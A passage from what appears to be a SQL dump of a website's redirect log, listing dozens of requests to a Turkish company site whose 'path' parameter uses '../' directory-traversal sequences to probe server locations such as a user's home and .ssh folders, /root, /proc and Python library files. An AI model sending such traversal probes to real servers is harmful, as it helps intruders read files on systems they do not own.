00:00:00',301),(79925,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../xtables/../python3.6/../nss/../libwebpdecoder.so',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fxtables%2F..%2Fpython3.6%2F..%2Fnss%2F..%2Flibwebpdecoder.so','',1,0,'2026-06-24 18:42:36','0000-00-00 00:00:00',301),(79926,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/samba/../firebird/../python2.7/stringold.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fsamba%2F..%2Ffirebird%2F..%2Fpython2.7%2Fstringold.py','',1,0,'2026-06-24 18:42:37','0000-00-00 00:00:00',301),(79927,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/rpm-plugins/../networkmanager/../python3.6/socket.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Frpm-plugins%2F..%2FNetworkManager%2F..%2Fpython3.6%2Fsocket.py','',1,0,'2026-06-24 18:42:38','0000-00-00 00:00:00',301),(79928,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../lua/../python3.6/site.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Flua%2F..%2Fpython3.6%2Fsite.py','',1,0,'2026-06-24 18:42:39','0000-00-00 00:00:00',301),(79929,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/libibverbs/../python3.6/../python2.7/../python2.7/mhlib.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flibibverbs%2F..%2Fpython3.6%2F..%2Fpython2.7%2F..%2Fpython2.7%2Fmhlib.py','',1,0,'2026-06-24 18:42:40','0000-00-00 00:00:00',301),(79930,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/libibverbs/../python3.6/../python2.7/../python2.7/base64.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flibibverbs%2F..%2Fpython3.6%2F..%2Fpython2.7%2F..%2Fpython2.7%2Fbase64.pyc','',1,0,'2026-06-24 18:42:41','0000-00-00 00:00:00',301),(79931,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/gio/../sa/../apache2/../python2.7/codeop.pyo',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fgio%2F..%2Fsa%2F..%2Fapache2%2F..%2Fpython2.7%2Fcodeop.pyo','',1,0,'2026-06-24 18:42:42','0000-00-00 00:00:00',301),(79932,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/.ssh/../php/data/../../..',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2F.ssh%2F..%2Fphp%2Fdata%2F..%2F..%2F..','',1,0,'2026-06-24 18:42:43','0000-00-00 00:00:00',301),(79933,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/libibverbs/../python3.6/../python2.7/../python2.7/functools.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flibibverbs%2F..%2Fpython3.6%2F..%2Fpython2.7%2F..%2Fpython2.7%2Ffunctools.pyc','',1,0,'2026-06-24 18:42:44','0000-00-00 00:00:00',301),(79934,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/logging/../importlib/../../python2.7/difflib.pyo',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2Flogging%2F..%2Fimportlib%2F..%2F..%2Fpython2.7%2Fdifflib.pyo','',1,0,'2026-06-24 18:42:45','0000-00-00 00:00:00',301),(79935,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/sse2/../python3.12/../python2.7/hmac.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fsse2%2F..%2Fpython3.12%2F..%2Fpython2.7%2Fhmac.py','',1,0,'2026-06-24 18:42:46','0000-00-00 00:00:00',301),(79936,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/ldb/../gconv/../apache2/../rpm-plugins/../python2.7/robotparser.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fldb%2F..%2Fgconv%2F..%2Fapache2%2F..%2Frpm-plugins%2F..%2Fpython2.7%2Frobotparser.py','',1,0,'2026-06-24 18:42:47','0000-00-00 00:00:00',301),(79937,'https://3s-technologies.com.tr/tr/91534?path=/home/../usr/lib64/php/../python2.7/importlib/../test',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Fusr%2Flib64%2Fphp%2F..%2Fpython2.7%2Fimportlib%2F..%2Ftest','',1,0,'2026-06-24 18:42:48','0000-00-00 00:00:00',301),(79938,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/firebird/../networkmanager/../python2.7/../libbasicobjects.so.0.1.0',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffirebird%2F..%2FNetworkManager%2F..%2Fpython2.7%2F..%2Flibbasicobjects.so.0.1.0','',1,0,'2026-06-24 18:42:49','0000-00-00 00:00:00',301),(79939,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../php/../python2.7/numbers.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fphp%2F..%2Fpython2.7%2Fnumbers.py','',1,0,'2026-06-24 18:42:50','0000-00-00 00:00:00',301),(79940,'https://3s-technologies.com.tr/tr/91534?path=/home/../usr/share/autoconf/../ghostscript/../../bin/patch',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Fusr%2Fshare%2Fautoconf%2F..%2Fghostscript%2F..%2F..%2Fbin%2Fpatch','',1,0,'2026-06-24 18:42:51','0000-00-00 00:00:00',301),(79941,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/../apache2/.././libpython2.7.so',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2Fapache2%2F..%2F.%2Flibpython2.7.so','',1,0,'2026-06-24 18:42:52','0000-00-00 00:00:00',301),(79942,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../xtables/../python3.6/concurrent/../pprint.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fxtables%2F..%2Fpython3.6%2Fconcurrent%2F..%2Fpprint.py','',1,0,'2026-06-24 18:42:53','0000-00-00 00:00:00',301),(79943,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/../security/../pkgconfig/../python2.7/getpass.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2Fsecurity%2F..%2Fpkgconfig%2F..%2Fpython2.7%2Fgetpass.pyc','',1,0,'2026-06-24 18:42:54','0000-00-00 00:00:00',301),(79944,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../php/../python3.6/pydoc_data',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fphp%2F..%2Fpython3.6%2Fpydoc_data','',1,0,'2026-06-24 18:42:55','0000-00-00 00:00:00',301),(79945,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/samba/../fipscheck/../python3.6/../samba/..',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fsamba%2F..%2Ffipscheck%2F..%2Fpython3.6%2F..%2Fsamba%2F..','',1,0,'2026-06-24 18:42:57','0000-00-00 00:00:00',301),(79946,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/libibverbs/../python3.6/../python2.7/../python2.7/tempfile.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flibibverbs%2F..%2Fpython3.6%2F..%2Fpython2.7%2F..%2Fpython2.7%2Ftempfile.pyc','',1,0,'2026-06-24 18:42:58','0000-00-00 00:00:00',301),(79947,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../enchant/../python2.7/../python3.12/ctypes',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fenchant%2F..%2Fpython2.7%2F..%2Fpython3.12%2Fctypes','',1,0,'2026-06-24 18:42:59','0000-00-00 00:00:00',301),(79948,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/../apache2/../lua/../python2.7/bsddb',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F..%2Fapache2%2F..%2Flua%2F..%2Fpython2.7%2Fbsddb','',1,0,'2026-06-24 18:43:00','0000-00-00 00:00:00',301),(79949,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/../apache2/../lua/../python2.7/dis.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F..%2Fapache2%2F..%2Flua%2F..%2Fpython2.7%2Fdis.py','',1,0,'2026-06-24 18:43:01','0000-00-00 00:00:00',301),(79950,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/sse2/../python3.12/../python2.7/runpy.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fsse2%2F..%2Fpython3.12%2F..%2Fpython2.7%2Frunpy.pyc','',1,0,'2026-06-24 18:43:01','0000-00-00 00:00:00',301),(79951,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../python3.12/sqlite3/../this.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fpython3.12%2Fsqlite3%2F..%2Fthis.py','',1,0,'2026-06-24 18:43:02','0000-00-00 00:00:00',301),(79952,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/../apache2/../lua/../python2.7/mimify.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F..%2Fapache2%2F..%2Flua%2F..%2Fpython2.7%2Fmimify.py','',1,0,'2026-06-24 18:43:03','0000-00-00 00:00:00',301),(79953,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/ldb/../python3.6/../networkmanager',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fldb%2F..%2Fpython3.6%2F..%2FNetworkManager','',1,0,'2026-06-24 18:43:05','0000-00-00 00:00:00',301),(79954,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../python3.12/dbm/../codeop.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fpython3.12%2Fdbm%2F..%2Fcodeop.py','',1,0,'2026-06-24 18:43:06','0000-00-00 00:00:00',301),(79955,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../usr/include/python3.6m/./../python2.7/bytesobject.h',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Fusr%2Finclude%2Fpython3.6m%2F.%2F..%2Fpython2.7%2Fbytesobject.h','',1,0,'2026-06-24 18:43:06','0000-00-00 00:00:00',301),(79956,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/ldb/../gconv/../php/../python2.7/doc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fldb%2F..%2Fgconv%2F..%2Fphp%2F..%2Fpython2.7%2FDoc','',1,0,'2026-06-24 18:43:08','0000-00-00 00:00:00',301),(79957,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../php/../python2.7/hmac.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fphp%2F..%2Fpython2.7%2Fhmac.pyc','',1,0,'2026-06-24 18:43:09','0000-00-00 00:00:00',301),(79958,'https://3s-technologies.com.tr/tr/91534?path=/home/../var/tmp/../proc/../../.',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Fvar%2Ftmp%2F..%2Fproc%2F..%2F..%2F.','',1,0,'2026-06-24 18:43:09','0000-00-00 00:00:00',301),(79959,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/tomllib/../../python3.6/../libwebpdecoder.so',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2Ftomllib%2F..%2F..%2Fpython3.6%2F..%2Flibwebpdecoder.so','',1,0,'2026-06-24 18:43:11','0000-00-00 00:00:00',301),(79960,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../usr/include/../include/python3.6m/../.',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Fusr%2Finclude%2F..%2Finclude%2Fpython3.6m%2F..%2F.','',1,0,'2026-06-24 18:43:12','0000-00-00 00:00:00',301),(79961,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/gio/../dovecot/../python3.12/sqlite3/../../gettext',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fgio%2F..%2Fdovecot%2F..%2Fpython3.12%2Fsqlite3%2F..%2F..%2Fgettext','',1,0,'2026-06-24 18:43:13','0000-00-00 00:00:00',301),(79962,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/.././apache2/../python2.7/traceback.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2F.%2Fapache2%2F..%2Fpython2.7%2Ftraceback.py','',1,0,'2026-06-24 18:43:13','0000-00-00 00:00:00',301),(79963,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../lua/../networkmanager/.././php',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Flua%2F..%2FNetworkManager%2F..%2F.%2Fphp','',1,0,'2026-06-24 18:43:14','0000-00-00 00:00:00',301),(79964,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/libibverbs/../python3.6/../python2.7/../python2.7/httplib.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flibibverbs%2F..%2Fpython3.6%2F..%2Fpython2.7%2F..%2Fpython2.7%2Fhttplib.pyc','',1,0,'2026-06-24 18:43:14','0000-00-00 00:00:00',301),(79965,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/firebird/../python3.12/../python2.7',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Ffirebird%2F..%2Fpython3.12%2F..%2Fpython2.7','',1,0,'2026-06-24 18:43:15','0000-00-00 00:00:00',301),(79966,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/../apache2/../libproxy/../../../root',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F..%2Fapache2%2F..%2Flibproxy%2F..%2F..%2F..%2Froot','',1,0,'2026-06-24 18:43:16','0000-00-00 00:00:00',301),(79967,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.6/json/../../python2.7/optparse.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.6%2Fjson%2F..%2F..%2Fpython2.7%2Foptparse.pyc','',1,0,'2026-06-24 18:43:17','0000-00-00 00:00:00',301),(79968,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../lua/.././python3.6/csv.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Flua%2F..%2F.%2Fpython3.6%2Fcsv.py','',1,0,'2026-06-24 18:43:18','0000-00-00 00:00:00',301),(79969,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/re/../../bind/../lua',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2Fre%2F..%2F..%2Fbind%2F..%2Flua','',1,0,'2026-06-24 18:43:19','0000-00-00 00:00:00',301),(79970,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/../tls/../python2.7/tools/../compiler',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2Ftls%2F..%2Fpython2.7%2FTools%2F..%2Fcompiler','',1,0,'2026-06-24 18:43:20','0000-00-00 00:00:00',301),(79971,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/../led-bazaar.net/../../../../lib64/python2.7/../python3.12/abc.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2F..%2Fled-bazaar.net%2F..%2F..%2F..%2F..%2Flib64%2Fpython2.7%2F..%2Fpython3.12%2Fabc.py','',1,0,'2026-06-24 18:43:21','0000-00-00 00:00:00',301),(79972,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../usr/include/../include/python3.6m/../webp',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Fusr%2Finclude%2F..%2Finclude%2Fpython3.6m%2F..%2Fwebp','',1,0,'2026-06-24 18:43:22','0000-00-00 00:00:00',301),(79973,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/../apache2/../bind/../python3.6/random.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F..%2Fapache2%2F..%2Fbind%2F..%2Fpython3.6%2Frandom.py','',1,0,'2026-06-24 18:43:23','0000-00-00 00:00:00',301),(79974,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/../apache2/../lua/../python2.7/os.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F..%2Fapache2%2F..%2Flua%2F..%2Fpython2.7%2Fos.pyc','',1,0,'2026-06-24 18:43:24','0000-00-00 00:00:00',301),(79975,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.6/sqlite3/../string.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.6%2Fsqlite3%2F..%2Fstring.py','',1,0,'2026-06-24 18:43:25','0000-00-00 00:00:00',301),(79976,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/.././apache2/../python2.7/urlparse.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2F.%2Fapache2%2F..%2Fpython2.7%2Furlparse.pyc','',1,0,'2026-06-24 18:43:26','0000-00-00 00:00:00',301),(79977,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../python3.12/importlib/../csv.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fpython3.12%2Fimportlib%2F..%2Fcsv.py','',1,0,'2026-06-24 18:43:27','0000-00-00 00:00:00',301),(79978,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../../lib/python3.12/../.',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2F..%2Flib%2Fpython3.12%2F..%2F.','',1,0,'2026-06-24 18:43:28','0000-00-00 00:00:00',301),(79979,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/multipath/../apache2/../python3.6/xml',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fmultipath%2F..%2Fapache2%2F..%2Fpython3.6%2Fxml','',1,0,'2026-06-24 18:43:29','0000-00-00 00:00:00',301),(79980,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/../www/../../../../usr/../usr',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2F..%2Fwww%2F..%2F..%2F..%2F..%2Fusr%2F..%2Fusr','',1,0,'2026-06-24 18:43:30','0000-00-00 00:00:00',301),(79981,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/../led-bazaar.net/../../../../lib64/python2.7/../python3.12/runpy.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2F..%2Fled-bazaar.net%2F..%2F..%2F..%2F..%2Flib64%2Fpython2.7%2F..%2Fpython3.12%2Frunpy.py','',1,0,'2026-06-24 18:43:31','0000-00-00 00:00:00',301),(79982,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../python3.12/../libpython3.12.so.1.0',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fpython3.12%2F..%2Flibpython3.12.so.1.0','',1,0,'2026-06-24 18:43:32','0000-00-00 00:00:00',301),(79983,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/ldb/../gconv/../python3.12/asyncio/../stringprep.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fldb%2F..%2Fgconv%2F..%2Fpython3.12%2Fasyncio%2F..%2Fstringprep.py','',1,0,'2026-06-24 18:43:33','0000-00-00 00:00:00',301),(79984,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/multipath/../apache2/../python3.6/contextlib.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fmultipath%2F..%2Fapache2%2F..%2Fpython3.6%2Fcontextlib.py','',1,0,'2026-06-24 18:43:34','0000-00-00 00:00:00',301),(79985,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/docs/../../.wp-cli/../.wp-cli/../tmp',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2Fdocs%2F..%2F..%2F.wp-cli%2F..%2F.wp-cli%2F..%2Ftmp','',1,0,'2026-06-24 18:43:35','0000-00-00 00:00:00',301),(79986,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/sse2/../python3.12/string.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fsse2%2F..%2Fpython3.12%2Fstring.py','',1,0,'2026-06-24 18:43:36','0000-00-00 00:00:00',301),(79987,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/multipath/../apache2/../python3.12/pathlib.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fmultipath%2F..%2Fapache2%2F..%2Fpython3.12%2Fpathlib.py','',1,0,'2026-06-24 18:43:37','0000-00-00 00:00:00',301),(79988,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/../sw/../python3.12/tkinter',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2Fsw%2F..%2Fpython3.12%2Ftkinter','',1,0,'2026-06-24 18:43:38','0000-00-00 00:00:00',301),(79989,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../lua/../python2.7/popen2.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Flua%2F..%2Fpython2.7%2Fpopen2.py','',1,0,'2026-06-24 18:43:39','0000-00-00 00:00:00',301),(79990,'https://3s-technologies.com.tr/tr/91534?path=/home/../proc/acpi/../fs/../../dev/../tmp',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Fproc%2Facpi%2F..%2Ffs%2F..%2F..%2Fdev%2F..%2Ftmp','',1,0,'2026-06-24 18:43:40','0000-00-00 00:00:00',301),(79991,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/docs/../../ocartdata3/../../../proc/../../run',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2Fdocs%2F..%2F..%2Focartdata3%2F..%2F..%2F..%2Fproc%2F..%2F..%2Frun','',1,0,'2026-06-24 18:43:41','0000-00-00 00:00:00',301),(79992,'https://3s-technologies.com.tr/tr/91534?path=/home/../usr/lib64/php/../python2.7/importlib/../_weakrefset.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Fusr%2Flib64%2Fphp%2F..%2Fpython2.7%2Fimportlib%2F..%2F_weakrefset.py','',1,0,'2026-06-24 18:43:43','0000-00-00 00:00:00',301),(79993,'https://3s-technologies.com.tr/tr/91534?path=/home/../usr/lib64/php/../python2.7/importlib/../fpformat.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Fusr%2Flib64%2Fphp%2F..%2Fpython2.7%2Fimportlib%2F..%2Ffpformat.py','',1,0,'2026-06-24 18:43:43','0000-00-00 00:00:00',301),(79994,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.6/json/../../python2.7/../libsegfault.so',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.6%2Fjson%2F..%2F..%2Fpython2.7%2F..%2FlibSegFault.so','',1,0,'2026-06-24 18:43:44','0000-00-00 00:00:00',301),(79995,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../enchant/../python2.7/../python3.12/fractions.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fenchant%2F..%2Fpython2.7%2F..%2Fpython3.12%2Ffractions.py','',1,0,'2026-06-24 18:43:44','0000-00-00 00:00:00',301),(79996,'https://3s-technologies.com.tr/tr/91534?path=/home/../usr/lib64/php/../python2.7/importlib/../hashlib.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Fusr%2Flib64%2Fphp%2F..%2Fpython2.7%2Fimportlib%2F..%2Fhashlib.py','',1,0,'2026-06-24 18:43:45','0000-00-00 00:00:00',301),(79997,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/.././apache2/../libbasicobjects.so.0',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2F.%2Fapache2%2F..%2Flibbasicobjects.so.0','',1,0,'2026-06-24 18:43:45','0000-00-00 00:00:00',301),(79998,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/../tls/../python2.7/tools/../filecmp.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2Ftls%2F..%2Fpython2.7%2FTools%2F..%2Ffilecmp.py','',1,0,'2026-06-24 18:43:46','0000-00-00 00:00:00',301),(79999,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../lua/.././python3.6/test',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Flua%2F..%2F.%2Fpython3.6%2Ftest','',1,0,'2026-06-24 18:43:47','0000-00-00 